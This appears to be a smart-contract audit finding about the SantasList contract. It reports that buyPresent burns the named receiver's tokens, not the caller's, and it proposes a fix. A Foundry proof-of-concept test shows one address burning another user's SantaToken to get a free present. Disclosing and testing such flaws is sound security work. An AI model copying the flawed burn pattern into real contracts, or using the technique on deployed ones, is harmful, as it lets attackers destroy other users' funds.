Any address is able to call buyPresent(address presentReceiver)
and use presentReceiver's
SantaToken to burn and get a present for free.
function buyPresent(address presentReceiver) external {
@>> i_santaToken.burn(presentReceiver);
_mintAndIncrement();
}
function testCanBuyPresentWithAnotherAddressesToken() public {
// Santa gives userToGetBurned address the EXTRA_NICE status and therefore the ability
// to collect a NFT and SantaToken.
vm.startPrank(santa);
santasList.checkList(userToGetBurned, SantasList.Status.EXTRA_NICE);
santasList.checkTwice(userToGetBurned, SantasList.Status.EXTRA_NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
// userToGetBurned address collectsPresent and SantaToken
vm.startPrank(userToGetBurned);
santasList.collectPresent();
uint256 balanceUserToGetBurnedTokenBefore = santaToken.balanceOf(userToGetBurned);
vm.stopPrank();
vm.startPrank(user);
// user address buys present with userToGetBurned tokens
santasList.buyPresent(userToGetBurned);
vm.stopPrank();
uint256 balanceUserToGetBurnedAfter = santaToken.balanceOf(userToGetBurned);
// santaToken mint for EXTRA_NICE addresses is 1e18 and "cost" burn is 1e18 as well
assertEq(balanceUserToGetBurnedAfter, balanceUserToGetBurnedTokenBefore - 1e18);
}
Foundry
i_santaToken.burn(presentReceiver)
should be modified to `i_santaToken.burn(msg.sender) so that the caller is burning his own tokens and is not able to burn someone elses.
Furthermore would it be useful to transfer the NFT to the present receiver right away
Current implementation allows a malicious actor to burn someone else's tokens as the burn function doesn't actually check for approvals.
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.